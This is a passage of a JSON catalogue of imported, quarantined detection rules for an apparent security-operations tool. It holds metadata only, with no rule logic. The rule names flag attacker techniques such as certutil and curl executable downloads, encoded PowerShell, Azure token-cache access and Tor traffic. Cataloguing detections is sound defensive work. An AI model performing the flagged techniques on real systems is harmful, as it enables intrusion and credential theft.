"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_command_execution.yaral" } }, { "id": "chronicle-detection-rules-suspicious-command-line-contains-azure-tokencachedat-as-argument-via-cmdline", "type": "detection", "name": "suspicious_command_line_contains_azure_tokencachedat_as_argument_via_cmdline", "description": 
"suspicious_command_line_contains_azure_tokencachedat_as_argument_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-command-line-contains-azure-tokencachedat-as-argument-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_command_line_contains_azure_tokencachedat_as_argument_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/cloud_security/sysmon/suspicious_command_line_contains_azure_tokencache_dat_as_argument__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-suspicious-command-net-user", "type": "detection", "name": "suspicious_command_net_user", "description": "suspicious_command_net_user", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-command-net-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_command_net_user", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", 
"upstream_path": "rules/_deprecated/suspicious/command_net_user.yaral" } }, { "id": "chronicle-detection-rules-suspicious-command-psexec", "type": "detection", "name": "suspicious_command_psexec", "description": "suspicious_command_psexec", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-command-psexec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_command_psexec", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/command_psexec.yaral" } }, { "id": "chronicle-detection-rules-suspicious-command-service-control", "type": "detection", "name": "suspicious_command_service_control", "description": "suspicious_command_service_control", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-command-service-control.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_command_service_control", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", 
"upstream_path": "rules/_deprecated/suspicious/command_service_control.yaral" } }, { "id": "chronicle-detection-rules-suspicious-command-shutdown", "type": "detection", "name": "suspicious_command_shutdown", "description": "suspicious_command_shutdown", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-command-shutdown.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_command_shutdown", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/command_shutdown.yaral" } }, { "id": "chronicle-detection-rules-suspicious-commandline-escape", "type": "detection", "name": "suspicious_commandline_escape", "description": "suspicious_commandline_escape", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-commandline-escape.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_commandline_escape", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", 
"upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_commandline_escape.yaral" } }, { "id": "chronicle-detection-rules-suspicious-compression-tool-parameters", "type": "detection", "name": "suspicious_compression_tool_parameters", "description": "suspicious_compression_tool_parameters", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-compression-tool-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_compression_tool_parameters", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_compression_tool_parameters.yaral" } }, { "id": "chronicle-detection-rules-suspicious-curl-exe-download", "type": "detection", "name": "suspicious_curl_exe_download", "description": "suspicious_curl_exe_download", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-curl-exe-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_curl_exe_download", "source_commit": 
"74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/suspicious_curl_exe_download.yaral" } }, { "id": "chronicle-detection-rules-suspicious-curl-usage", "type": "detection", "name": "suspicious_curl_usage", "description": "suspicious_curl_usage", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-curl-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_curl_usage", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/suspicious_curl_usage.yaral" } }, { "id": "chronicle-detection-rules-suspicious-dns-query-with-b64-encoded-string", "type": "detection", "name": "suspicious_dns_query_with_b64_encoded_string", "description": "suspicious_dns_query_with_b64_encoded_string", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-dns-query-with-b64-encoded-string.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", 
"source_id": "suspicious_dns_query_with_b64_encoded_string", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/dns/suspicious_dns_query_with_b64_encoded_string.yaral" } }, { "id": "chronicle-detection-rules-suspicious-double-extension", "type": "detection", "name": "suspicious_double_extension", "description": "suspicious_double_extension", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-double-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_double_extension", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_double_extension.yaral" } }, { "id": "chronicle-detection-rules-suspicious-download-via-certutil-exe", "type": "detection", "name": "suspicious_download_via_certutil_exe", "description": "suspicious_download_via_certutil_exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-download-via-certutil-exe.yaml", "quarantine_reason": "imported rule; 
upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_download_via_certutil_exe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/suspicious_download_via_certutil_exe.yaral" } }, { "id": "chronicle-detection-rules-suspicious-driver-load-from-temp", "type": "detection", "name": "suspicious_driver_load_from_temp", "description": "suspicious_driver_load_from_temp", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-driver-load-from-temp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_driver_load_from_temp", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/suspicious_driver_load_from_temp.yaral" } }, { "id": "chronicle-detection-rules-suspicious-encoded-powershell-command-line", "type": "detection", "name": "suspicious_encoded_powershell_command_line", "description": "suspicious_encoded_powershell_command_line", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, 
"path": "detections/chronicle-imports/_quarantine/suspicious-encoded-powershell-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_encoded_powershell_command_line", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_encoded_powershell_command_line.yaral" } }, { "id": "chronicle-detection-rules-suspicious-entra-id-sign-in-external-call", "type": "detection", "name": "suspicious_entra_id_sign_in_external_call", "description": "suspicious_entra_id_sign_in_external_call", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-entra-id-sign-in-external-call.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_entra_id_sign_in_external_call", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/o365/suspicious_entra_id_sign_in_external_call.yaral" } }, { "id": "chronicle-detection-rules-suspicious-execute-remote-batch-script", "type": "detection", "name": "suspicious_execute_remote_batch_script", "description": "suspicious_execute_remote_batch_script", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-execute-remote-batch-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_execute_remote_batch_script", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/execute_remote_batch_script.yaral" } }, { "id": "chronicle-detection-rules-suspicious-execute-remote-cscript", "type": "detection", "name": "suspicious_execute_remote_cscript", "description": "suspicious_execute_remote_cscript", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-execute-remote-cscript.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_execute_remote_cscript", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/execute_remote_cscript.yaral" } }, { "id": "chronicle-detection-rules-suspicious-execution-from-outlook", "type": "detection", "name": "suspicious_execution_from_outlook", "description": "suspicious_execution_from_outlook", "version": "1.0.0", 
"author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-execution-from-outlook.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_execution_from_outlook", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_execution_from_outlook.yaral" } }, { "id": "chronicle-detection-rules-suspicious-file-downloaded-from-file-sharing-website-via-certutil-exe", "type": "detection", "name": "suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe", "description": "suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-file-downloaded-from-file-sharing-website-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/community/microsoft/windows/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.yaral" } }, { "id": "chronicle-detection-rules-suspicious-gup-usage", "type": "detection", "name": "suspicious_gup_usage", "description": "suspicious_gup_usage", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-gup-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_gup_usage", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_gup_usage.yaral" } }, { "id": "chronicle-detection-rules-suspicious-hwp-sub-processes", "type": "detection", "name": "suspicious_hwp_sub_processes", "description": "suspicious_hwp_sub_processes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-hwp-sub-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_hwp_sub_processes", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", 
"imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_hwp_sub_processes.yaral" } }, { "id": "chronicle-detection-rules-suspicious-invoke-webrequest-execution", "type": "detection", "name": "suspicious_invoke_webrequest_execution", "description": "suspicious_invoke_webrequest_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-invoke-webrequest-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_invoke_webrequest_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/suspicious_invoke_webrequest_execution.yaral" } }, { "id": "chronicle-detection-rules-suspicious-msiexec-directory", "type": "detection", "name": "suspicious_msiexec_directory", "description": "suspicious_msiexec_directory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-msiexec-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_msiexec_directory", "source_commit": 
"74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_msiexec_directory.yaral" } }, { "id": "chronicle-detection-rules-suspicious-outbound-traffic-elasticsearch", "type": "detection", "name": "suspicious_outbound_traffic_elasticsearch", "description": "suspicious_outbound_traffic_elasticsearch", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-outbound-traffic-elasticsearch.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_outbound_traffic_elasticsearch", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/outbound_traffic_elasticsearch.yaral" } }, { "id": "chronicle-detection-rules-suspicious-outbound-traffic-irc", "type": "detection", "name": "suspicious_outbound_traffic_irc", "description": "suspicious_outbound_traffic_irc", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-outbound-traffic-irc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine 
yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_outbound_traffic_irc", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/outbound_traffic_irc.yaral" } }, { "id": "chronicle-detection-rules-suspicious-outbound-traffic-tor", "type": "detection", "name": "suspicious_outbound_traffic_tor", "description": "suspicious_outbound_traffic_tor", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-outbound-traffic-tor.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_outbound_traffic_tor", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/suspicious/outbound_traffic_tor.yaral" } }, { "id": "chronicle-detection-rules-suspicious-parent-of-cscexe", "type": "detection", "name": "suspicious_parent_of_cscexe", "description": "suspicious_parent_of_cscexe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-parent-of-cscexe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC 
engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_parent_of_cscexe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/suspicious_parent_of_csc_exe.yaral" } }, { "id": "chronicle-detection-rules-suspicious-powershell-in-registry-run-keys", "type": "detection", "name": "suspicious_powershell_in_registry_run_keys", "description": "suspicious_powershell_in_registry_run_keys", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-powershell-in-registry-run-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_powershell_in_registry_run_keys", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/suspicious_powershell_in_registry_run_keys.yaral" } }, { "id": "chronicle-detection-rules-suspicious-powershell-invocation-based-on-parent-process", "type": "detection", "name": "suspicious_powershell_invocation_based_on_parent_process", "description": "suspicious_powershell_invocation_based_on_parent_process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": 
"imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-powershell-invocation-based-on-parent-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_powershell_invocation_based_on_parent_process", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_powershell_invocation_based_on_parent_process.yaral" } }, { "id": "chronicle-detection-rules-suspicious-powershell-parameter-substring", "type": "detection", "name": "suspicious_powershell_parameter_substring", "description": "suspicious_powershell_parameter_substring", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-powershell-parameter-substring.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_powershell_parameter_substring", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_powershell_parameter_substring.yaral" } }, { "id": "chronicle-detection-rules-suspicious-process-created-on-unusual-directories", "type": "detection", "name": "suspicious_process_created_on_unusual_directories", 
"description": "suspicious_process_created_on_unusual_directories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-process-created-on-unusual-directories.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_process_created_on_unusual_directories", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/suspicious_process_created_on_unusual_directories.yaral" } }, { "id": "chronicle-detection-rules-suspicious-process-creation", "type": "detection", "name": "suspicious_process_creation", "description": "suspicious_process_creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-process-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_process_creation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_process_creation.yaral" } }, { "id": "chronicle-detection-rules-suspicious-process-start-locations", "type": "detection", "name": "suspicious_process_start_locations", "description": "suspicious_process_start_locations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-process-start-locations.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "suspicious_process_start_locations", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/suspicious_process_start_locations.yaral" } }, { "id": "chronicle-detection-rules-suspicious-program-location-process-starts", "type": "detection", "name": "suspicious_program_location_process_starts", "description": "suspicious_program_location_process_starts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/suspicious-program-location-process-starts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": 
